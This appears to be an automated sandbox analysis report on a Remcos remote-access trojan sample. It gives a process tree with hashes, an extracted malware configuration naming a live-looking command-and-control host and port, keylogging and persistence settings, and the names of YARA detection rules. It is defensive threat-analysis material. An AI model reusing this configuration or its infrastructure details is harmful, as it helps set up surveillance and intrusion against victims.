"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1500 --fi eld-trial- handle=149 2,i,716234 0336741099 282,820355 2688004924 699,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 7064 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 5024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 3424 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 360 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2076 --fi eld-trial- handle=201 2,i,384804 2767598446 159,158321 1843310200 9625,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6604 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6816 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2052 --fi eld-trial- handle=202 8,i,159242 5017520913 3703,83491 5556745069 7044,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 8824 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 1892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 8760 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 3236 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1728 --fi eld-trial- handle=198 0,i,722558 2587041739 135,147144 9061350623 4970,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6652 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1412 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2060 --fi eld-trial- handle=201 2,i,857460 0569835257 597,125034 5185051422 1727,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 5672 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 2504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 6552 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6452 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1648 --fi eld-trial- handle=199 6,i,183423 8490119294 3427,30019 1688173348 7027,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1276 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7788 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2056 --fi eld-trial- handle=200 8,i,133498 7476283259 4225,98190 7106863065 6309,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - svchost.exe (PID: 2076 cmdline:
svchost.ex e MD5: 1ED18311E3DA35942DB37D15FA40CC5B) - conhost.exe (PID: 7332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 2928 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://g o.microsof t.com/fwli nk/?prd=11 324&pver=4 .5&sbp=App Launch2&pl cid=0x409& o1=SHIM_NO VERSION_FO UND&versio n=(null)&p rocessName =svchost.e xe&platfor m=0009&osv er=7&isSer ver=0&shim ver=4.0.30 319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 9232 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2148 --fi eld-trial- handle=198 4,i,110694 3979726229 7707,89659 0743492590 315,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6020 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2432 --fi eld-trial- handle=236 0,i,893463 2438909745 951,221368 1595228066 499,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 5636 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "ab9001.ddns.net:23782:1", "Assigned name": "OCTOBERS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "VLC.exe", "Startup value": "Rmc", "Hide file": "Disable", "Mutex": "Chrorne-K04X5E", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 11 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 11 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |